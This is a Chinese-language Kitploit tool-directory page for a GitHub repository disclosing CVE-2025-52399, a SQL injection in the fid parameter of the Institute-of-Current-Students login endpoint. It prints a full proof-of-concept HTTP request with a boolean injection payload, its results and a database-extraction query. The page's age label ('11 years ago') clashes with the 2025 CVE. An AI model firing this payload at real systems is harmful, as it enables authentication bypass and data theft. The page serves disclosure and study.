Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-52399-SQLi-Institute-of-Current-Students | Kitploit
工具/GitHubGitHub/userr404/cve-2025-52399-sqli-institute-of-current-students
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试论文与研究学习与教育
GitHubuserr404/cve-2025-52399-sqli-institute-of-current-students

CVE-2025-52399-SQLi-Institute-of-Current-Students

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
11年前尚未审核

CVE-2025-52399 - Institute-of-Current-Students 中的 SQL 注入

摘要

Institute-of-Current-Students 应用程序中的 loginlinkfaculty 端点存在 SQL 注入漏洞,漏洞通过 fid POST 参数触发。该参数在用于 SQL 查询之前未进行适当清理,允许远程攻击者执行任意 SQL 命令。

  • 漏洞类型:SQL 注入
  • 受影响组件:/loginlinkfaculty(POST)
  • 受影响参数:fid
  • 身份验证:不需要
  • 影响:身份验证绕过、数据提取
  • 测试环境:localhost
  • 数据库:icsnew
  • 版本:1.0

PoC

HTTP 请求

http POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

fid=-1'+OR+321=6+AND+000942=000942--&pass=example

Payload 结果

✅ -1' OR 3*2*1=6 AND 000942=000942 -- → 正确 ❌ -1' OR 2*3=4 AND 000942=000942 -- → 错误

数据库提取

SELECT database(); -- returns 'icsnew'

参考

  • CVE-2025-52399 (MITRE)
  • 存在漏洞的应用程序
  • OWASP SQL 注入

发现者

Isroil Mustafoqulov

下载工具